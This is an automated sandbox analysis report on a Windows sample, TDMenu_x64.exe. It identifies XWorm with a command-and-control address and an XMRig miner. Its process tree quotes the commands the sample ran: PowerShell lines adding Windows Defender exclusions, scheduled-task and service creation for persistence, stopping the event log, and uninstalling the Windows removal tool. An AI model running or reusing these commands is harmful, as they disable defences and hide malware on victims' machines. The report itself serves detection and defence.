Resubmissions
22-01-2025 15:50
250122-s99tasvlcp 1022-01-2025 15:46
250122-s7peksvkbr 1022-01-2025 15:45
250122-s7aanatkgx 1022-01-2025 14:49
250122-r7c6wa1ncx 10Analysis
-
max time kernel
28s -
max time network
29s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
22-01-2025 15:50
Static task
static1
Behavioral task
behavioral1
Sample
TDMenu_x64.exe
Resource
win11-20241007-en
General
-
Target
TDMenu_x64.exe
-
Size
6.4MB
-
MD5
3f9d8993daa6e07221f9a12eaa011ca6
-
SHA1
a33290d94fb3bba06337b7b847d971b1a8fd6110
-
SHA256
109bf7761442498abd03f972c2b315b6ea8727a79ed35e7e75a90e6d1e4b7f79
-
SHA512
ffb917e3a01e72b5cec0c8ff41328bac3840c6be0dcb05a58513a3f77a32c2280fc6881109725ba931b31809fbb0abb83bdacd9ec8022ea8a49d6476ca2177c0
-
SSDEEP
98304:S/STPMYacPcyyc7Ht40MV+9eN+jCxf8/kbqEVgUmSr7CqnfMwd+mJbKc1rm7cNAH:S9xcPj9Hy0MWGxk/kWEu72t+mKlPDT
Malware Config
Extracted
xworm
23.27.201.57:7000
-
Install_directory
%ProgramData%
-
install_file
DirectX End-User Runtime.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x001d00000002ab0d-13.dat family_xworm behavioral1/memory/4380-20-0x0000000000040000-0x000000000005A000-memory.dmp family_xworm -
Xmrig family
-
Xworm family
-
XMRig Miner payload 7 IoCs
resource yara_rule behavioral1/memory/2908-106-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2908-107-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2908-110-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2908-111-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2908-109-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2908-113-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2908-112-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3332 powershell.exe 336 powershell.exe 2984 powershell.exe 3056 powershell.exe 3380 powershell.exe 4928 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts GameBar-Update-Service.exe File created C:\Windows\system32\drivers\etc\hosts GameBarUpdateService.exe -
Stops running service(s) 4 TTPs
-
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DirectX End-User Runtime.lnk DirectX End-User Runtime.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DirectX End-User Runtime.lnk DirectX End-User Runtime.exe -
Executes dropped EXE 4 IoCs
pid Process 1156 TDMenu.exe 4380 DirectX End-User Runtime.exe 2376 GameBar-Update-Service.exe 1068 GameBarUpdateService.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\DirectX End-User Runtime = "C:\\ProgramData\\DirectX End-User Runtime.exe" DirectX End-User Runtime.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe GameBar-Update-Service.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe GameBarUpdateService.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1068 set thread context of 2976 1068 GameBarUpdateService.exe 103 PID 1068 set thread context of 2908 1068 GameBarUpdateService.exe 105 -
resource yara_rule behavioral1/memory/2908-102-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2908-106-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2908-107-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2908-110-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2908-111-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2908-109-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2908-113-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2908-112-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2908-105-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2908-101-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2908-104-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2908-103-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4068 sc.exe 1240 sc.exe 4792 sc.exe 5024 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3884 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 2376 GameBar-Update-Service.exe 336 powershell.exe 336 powershell.exe 3484 taskmgr.exe 3484 taskmgr.exe 2376 GameBar-Update-Service.exe 2376 GameBar-Update-Service.exe 2376 GameBar-Update-Service.exe 2376 GameBar-Update-Service.exe 2376 GameBar-Update-Service.exe 2376 GameBar-Update-Service.exe 1068 GameBarUpdateService.exe 2984 powershell.exe 2984 powershell.exe 3484 taskmgr.exe 3484 taskmgr.exe 1068 GameBarUpdateService.exe 1068 GameBarUpdateService.exe 3484 taskmgr.exe 1068 GameBarUpdateService.exe 3484 taskmgr.exe 2908 explorer.exe 2908 explorer.exe 3484 taskmgr.exe 2908 explorer.exe 2908 explorer.exe 3056 powershell.exe 3056 powershell.exe 3380 powershell.exe 3380 powershell.exe 4928 powershell.exe 3484 taskmgr.exe 4928 powershell.exe 2908 explorer.exe 2908 explorer.exe 3332 powershell.exe 3332 powershell.exe 4380 DirectX End-User Runtime.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 2908 explorer.exe 2908 explorer.exe 3484 taskmgr.exe 3484 taskmgr.exe 2908 explorer.exe 2908 explorer.exe 3484 taskmgr.exe 3484 taskmgr.exe 2908 explorer.exe 2908 explorer.exe 3484 taskmgr.exe 3484 taskmgr.exe 2908 explorer.exe 2908 explorer.exe 3484 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 4380 DirectX End-User Runtime.exe Token: SeDebugPrivilege 3484 taskmgr.exe Token: SeSystemProfilePrivilege 3484 taskmgr.exe Token: SeCreateGlobalPrivilege 3484 taskmgr.exe Token: SeDebugPrivilege 336 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeLockMemoryPrivilege 2908 explorer.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeDebugPrivilege 3380 powershell.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 3332 powershell.exe Token: SeDebugPrivilege 4380 DirectX End-User Runtime.exe -
Suspicious use of FindShellTrayWindow 32 IoCs
pid Process 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe 3484 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4380 DirectX End-User Runtime.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 4136 wrote to memory of 1156 4136 TDMenu_x64.exe 77 PID 4136 wrote to memory of 1156 4136 TDMenu_x64.exe 77 PID 4136 wrote to memory of 4380 4136 TDMenu_x64.exe 79 PID 4136 wrote to memory of 4380 4136 TDMenu_x64.exe 79 PID 4136 wrote to memory of 2376 4136 TDMenu_x64.exe 80 PID 4136 wrote to memory of 2376 4136 TDMenu_x64.exe 80 PID 1216 wrote to memory of 1504 1216 cmd.exe 91 PID 1216 wrote to memory of 1504 1216 cmd.exe 91 PID 1920 wrote to memory of 3528 1920 cmd.exe 99 PID 1920 wrote to memory of 3528 1920 cmd.exe 99 PID 1068 wrote to memory of 2976 1068 GameBarUpdateService.exe 103 PID 1068 wrote to memory of 2976 1068 GameBarUpdateService.exe 103 PID 1068 wrote to memory of 2976 1068 GameBarUpdateService.exe 103 PID 1068 wrote to memory of 2976 1068 GameBarUpdateService.exe 103 PID 1068 wrote to memory of 2976 1068 GameBarUpdateService.exe 103 PID 1068 wrote to memory of 2976 1068 GameBarUpdateService.exe 103 PID 1068 wrote to memory of 2976 1068 GameBarUpdateService.exe 103 PID 1068 wrote to memory of 2976 1068 GameBarUpdateService.exe 103 PID 1068 wrote to memory of 2976 1068 GameBarUpdateService.exe 103 PID 1068 wrote to memory of 2908 1068 GameBarUpdateService.exe 105 PID 1068 wrote to memory of 2908 1068 GameBarUpdateService.exe 105 PID 1068 wrote to memory of 2908 1068 GameBarUpdateService.exe 105 PID 1068 wrote to memory of 2908 1068 GameBarUpdateService.exe 105 PID 1068 wrote to memory of 2908 1068 GameBarUpdateService.exe 105 PID 2212 wrote to memory of 1612 2212 cmd.exe 106 PID 2212 wrote to memory of 1612 2212 cmd.exe 106 PID 4380 wrote to memory of 3056 4380 DirectX End-User Runtime.exe 108 PID 4380 wrote to memory of 3056 4380 DirectX End-User Runtime.exe 108 PID 4380 wrote to memory of 3380 4380 DirectX End-User Runtime.exe 110 PID 4380 wrote to memory of 3380 4380 DirectX End-User Runtime.exe 110 PID 4380 wrote to memory of 4928 4380 DirectX End-User Runtime.exe 112 PID 4380 wrote to memory of 4928 4380 DirectX End-User Runtime.exe 112 PID 4380 wrote to memory of 3332 4380 DirectX End-User Runtime.exe 114 PID 4380 wrote to memory of 3332 4380 DirectX End-User Runtime.exe 114 PID 4380 wrote to memory of 3884 4380 DirectX End-User Runtime.exe 116 PID 4380 wrote to memory of 3884 4380 DirectX End-User Runtime.exe 116 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\TDMenu_x64.exe"C:\Users\Admin\AppData\Local\Temp\TDMenu_x64.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\ProgramData\TDMenu.exe"C:\ProgramData\TDMenu.exe"2⤵
- Executes dropped EXE
PID:1156
-
-
C:\ProgramData\DirectX End-User Runtime.exe"C:\ProgramData\DirectX End-User Runtime.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\DirectX End-User Runtime.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DirectX End-User Runtime.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\DirectX End-User Runtime.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DirectX End-User Runtime.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3332
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DirectX End-User Runtime" /tr "C:\ProgramData\DirectX End-User Runtime.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3884
-
-
-
C:\ProgramData\GameBar-Update-Service.exe"C:\ProgramData\GameBar-Update-Service.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2376 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:336
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1504
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "Xbox GameBar Update"3⤵
- Launches sc.exe
PID:4068
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "Xbox GameBar Update" binpath= "C:\ProgramData\XboxGame\GameBarUpdateService.exe" start= "auto"3⤵
- Launches sc.exe
PID:1240
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:5024
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "Xbox GameBar Update"3⤵
- Launches sc.exe
PID:4792
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\ProgramData\GameBar-Update-Service.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3528
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3484
-
C:\ProgramData\XboxGame\GameBarUpdateService.exeC:\ProgramData\XboxGame\GameBarUpdateService.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1612
-
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2976
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
77KB
MD518d86f6b69457eb245764f48643697df
SHA181da90762a99e970874a1c9a0ce60c267c02b18c
SHA25675a6a0ee2e9749380b9c26dedea02ce7cb7d7b140e45ed054868be6f80d56b33
SHA5129e1f2851e3c9e2a32f710521259fa637b20daad431573f941e89fb731143a83d147ff849ecc1c7e3c95a88d708f56aa4ace707ce52789ac40c1cd048ecd119c1
-
Filesize
5.1MB
MD502f3666b4f382f4b9c64ddda3183ab7e
SHA1ef7828f1040da2c09788d56a0205358fcc533065
SHA2562b2653d6ba0add65199560b9315aa06a157d80271b5bcd6a5c7caca7a5e27bb6
SHA5127b70ec1a76c296525310e4f1984b279639ed25e70114d7aa890e76a4c9a6eae14169195247f1613f1c83ace40f62ef29902c54676718a9299b38bd9d85638f75
-
Filesize
1.2MB
MD5443a251e35d62f4ca4aeb3b5350adea9
SHA1edd6c016656e1eb673066cb19f6d0187e4db046f
SHA2568f73d7c48e9bf46f6a31e0a76090ff6b61f5ccc208f9a0f523f7604fcbc7273e
SHA51291b04727b34f73432eac1dadd86d451d794cc72414ea0f864237a782959910a916a9162d9ac7b9bc5575e603480732bd8e7f59015d770a0ab8105476f030bd94
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD545f53352160cf0903c729c35c8edfdce
SHA1b35a4d4fbaf2a3cc61e540fc03516dd70f3c34ab
SHA2569cf18d157a858fc143a6de5c2dd3f618516a527b34478ac478d8c94ff027b0d2
SHA512e3fa27a80a1df58acb49106c306dab22e5ed582f6b0cd7d9c3ef0a85e9f5919333257e88aa44f42a0e095fd577c9e12a02957a7845c0d109f821f32d8d3343f3
-
Filesize
944B
MD5050567a067ffea4eb40fe2eefebdc1ee
SHA16e1fb2c7a7976e0724c532449e97722787a00fec
SHA2563952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e
SHA512341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259
-
Filesize
944B
MD5781da0576417bf414dc558e5a315e2be
SHA1215451c1e370be595f1c389f587efeaa93108b4c
SHA25641a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe
SHA51224e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737
-
Filesize
944B
MD51b97141c46911b9a87daafdbe0ee275b
SHA1538f0853fdf5ea6ad37b98154d9ffc5a95f35574
SHA25624102236f494233a28e48151a96cf8a34630f68904451f532aa44d4232c29d68
SHA512a1d2d51b47d5ea51e3db17d697dbe9ad768d32ebea1127efaed5c533e5c4a111b4f5b9f3519de7e195e236e16a88f6d7f23acc4ac7e7d5a8d643fcf4b55834b9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DirectX End-User Runtime.lnk
Filesize757B
MD51f8003792f321a565d6bb0709c37f0f8
SHA12a16df780efaaf01b918ccf05f69c5d7cb9ec510
SHA25602a2a48536caa651394ded633eb85014f6605b6e453bebc6eb3bb433b82b3b87
SHA51284525610220377873ec8202f263c78e35e15ee0b7d934f585d90fcc54a05d4c3ca2b91a2983c3958b6a7501cc4c87100ce99c569a3199ead8cbed3c4c3ea312e
-
Filesize
2KB
MD5e1bc11b4431e4d20a764ceae5159f3c4
SHA10c34c0f1b360caa3a9d5ca118a512523a5e82b3b
SHA256c7f0ecce330d3e41e4cdda8f6c20ff61004e343229f34f4db37ecf01e516c35c
SHA512dd7a7dfa8f115b4664f458d69229d6b4dfeb5252b4e20edf4aed717033fa7588d861abc116d648514bada34cb5f51c5c0a74bd0285e91e3e34e9d195dd216b18